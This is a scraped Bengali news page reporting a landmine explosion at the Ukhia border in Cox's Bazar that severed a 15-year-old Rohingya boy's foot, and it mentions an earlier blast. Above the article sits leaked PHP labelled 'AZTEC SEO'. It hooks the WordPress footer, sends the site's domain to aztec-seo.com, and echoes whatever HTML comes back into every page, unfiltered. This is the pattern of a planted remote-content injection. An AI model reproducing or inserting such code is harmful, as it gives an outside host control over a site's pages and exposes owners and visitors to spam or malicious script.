/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); উখিয়া সীমান্তে মাইন বিস্ফোরণ, রোহিঙ্গা কিশোরের পা বিচ্ছিন্ন | Dhaka Sky News

ঠাকুরগাঁওয়ে ৮৫ দিনে ৭২ প্রাণহানি, আত্মহত্যা-অপমৃত্যুর মিছিল থামবে কবে?

আগের সংবাদ

‘চতুর্থ শ্রেণি থেকে খেলাধুলা বাধ্যতামূলক’

পরের সংবাদ

উখিয়া সীমান্তে মাইন বিস্ফোরণ, রোহিঙ্গা কিশোরের পা বিচ্ছিন্ন

কক্সবাজার প্রতিনিধি

প্রকাশিত: March 29, 2026 , 7:27 pm

কক্সবাজারের উখিয়া সীমান্তে মিয়ানমারের আরাকান আর্মির পুঁতে রাখা স্থলমাইন বিস্ফোরণে আব্দুল হাকিম (১৫) নামে এক রোহিঙ্গা কিশোরের পা বিচ্ছিন্ন হয়ে গেছে।রোববার (২৯ মার্চ) দুপুর ১টার দিকে উখিয়া উপজেলার পালংখালী ইউনিয়নের বালুখালী সীমান্তে নাফ নদীর শূন্যরেখায় এ ঘটনা ঘটে। আহত আব্দুল হাকিম উখিয়ার ১৯ নম্বর রোহিঙ্গা ক্যাম্পের ‘এ’ ব্লকের বাসিন্দা মোহাম্মদ ইব্রাহিমের ছেলে।

বিজিবির উখিয়া ৬৪ ব্যাটালিয়নের অধিনায়ক লেফটেন্যান্ট কর্নেল মো. জহিরুল ইসলাম বিষয়টি নিশ্চিত করেছেন।  তিনি জানান, নাফ নদীতে মাছ আহরণ শেষে তীরে ওঠার সময় হঠাৎ বিকট শব্দে বিস্ফোরণ ঘটে। এতে গুরুতর আহত হয় ওই কিশোর। বিস্ফোরণে তার ডান পায়ের গোড়ালি বিচ্ছিন্ন হয়ে যায় এবং শরীরের বিভিন্ন স্থানে মারাত্মক জখম হয়।

তিনি আরও জানান, ঘটনার পর স্থানীয়রা আহত কিশোরকে উদ্ধার করে উখিয়ার কুতুপালং এমএসএফ হাসপাতালে ভর্তি করেন। পরে তার শারীরিক অবস্থার অবনতি হলে কর্তব্যরত চিকিৎসক তাকে কক্সবাজার জেলা সদর হাসপাতালে পাঠান।

এর আগে গত বৃহস্পতিবার (২৬ মার্চ) একই উপজেলার পালংখালী ইউনিয়নের আঞ্জুমানপাড়া সীমান্তে নাফ নদীর শূন্যরেখায় স্থলমাইন বিস্ফোরণে মোহাম্মদ শহীদুল ইসলাম (২৫) নামে আরেক রোহিঙ্গা যুবকের পা বিচ্ছিন্ন হয়।

সীমান্তজুড়ে এমন মাইন বিস্ফোরণের পুনরাবৃত্তিতে আতঙ্কে রয়েছেন স্থানীয় বাসিন্দা ও রোহিঙ্গারা।